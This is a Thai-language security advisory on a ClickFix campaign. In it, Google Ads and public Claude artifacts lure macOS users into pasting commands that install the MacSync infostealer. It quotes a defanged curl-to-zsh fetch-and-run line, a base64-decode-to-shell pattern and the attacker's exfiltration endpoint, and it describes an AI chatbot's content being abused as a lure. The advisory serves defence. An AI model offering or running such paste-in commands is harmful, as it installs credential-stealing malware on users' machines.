Claude LLM artifacts ถูกใช้ในการโจมตี ClickFix เพื่อเผยแพร่มัลแวร์ขโมยข้อมูลบน Mac

กลุ่มผู้ไม่หวังดีกำลังใช้ประโยชน์จาก Claude artifacts และ Google Ads ในแคมเปญ ClickFix เพื่อส่งมัลแวร์ขโมยข้อมูลไปยังผู้ใช้งาน macOS ที่ค้นหาคำสั่งบางอย่าง แคมเปญนี้ส่งผลกระทบต่อผู้ใช้งาน MacSync infostealer ซึ่งถูกส่งผ่านการรันคำสั่ง shell ที่มาจากแหล่งข้อมูลที่ดูน่าเชื่อถือแต่เป็นอันตราย

Severity: สูง

System Impact:

• macOS
• Google Ads
• Claude LLM (Anthropic)

Technical Attack Steps:

1. กลุ่มผู้ไม่หวังดีใช้ Google Ads เพื่อโปรโมตผลการค้นหาที่เป็นอันตราย ซึ่งนำไปสู่ Claude artifact สาธารณะ หรือบทความ Medium ที่แอบอ้างเป็น Apple Support
2. ผู้ใช้งานจะได้รับคำแนะนำให้คัดลอกคำสั่ง shell ไปวางใน Terminal (มีสองรูปแบบ: ‘echo “…” | base64 -D | zsh’ หรือ ‘true && cur””l -SsLfk –compressed “https://raxelpak[.]com/curl/[hash]” | zsh’)
3. การรันคำสั่งใน Terminal จะดาวน์โหลดมัลแวร์ loader สำหรับ MacSync infostealer
4. มัลแวร์จะสร้างการเชื่อมต่อกับโครงสร้างพื้นฐาน Command-and-Control (C2) โดยใช้โทเค็นและ API key ที่กำหนดไว้ และปลอมแปลง user-agent ของเบราว์เซอร์ macOS
5. มัลแวร์ใช้ AppleScript (osascript) เพื่อขโมยข้อมูลที่ละเอียดอ่อน เช่น Keychain, ข้อมูลเบราว์เซอร์ และกระเป๋าคริปโต
6. ข้อมูลที่ถูกขโมยจะถูกบรรจุในไฟล์ ‘/tmp/osalogging.zip’ และส่งออกไปยัง C2 ของผู้โจมตีที่ a2abotnet[.]com/gate ผ่านคำขอ HTTP POST
7. หลังจากอัปโหลดสำเร็จ มัลแวร์จะลบร่องรอยทั้งหมด

Recommendations:

Short Term:

• หลีกเลี่ยงการรันคำสั่งใน Terminal ที่ไม่เข้าใจอย่างถ่องแท้ โดยเฉพาะจากแหล่งที่ไม่น่าเชื่อถือ (เช่น โฆษณา Google Ads หรือจาก LLM artifacts)

Long Term:

• ระมัดระวังผลการค้นหาจาก Google Ads และตรวจสอบความถูกต้องของแหล่งที่มาก่อนดำเนินการใดๆ
• ก่อนรันคำสั่งใดๆ ควรทำความเข้าใจคำสั่งนั้นอย่างละเอียด หรือสอบถาม Chatbot ในการสนทนาเดียวกันเกี่ยวกับความปลอดภัยของคำสั่ง
• ติดตั้งและอัปเดตซอฟต์แวร์ความปลอดภัยบน macOS อย่างสม่ำเสมอ

Source: https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/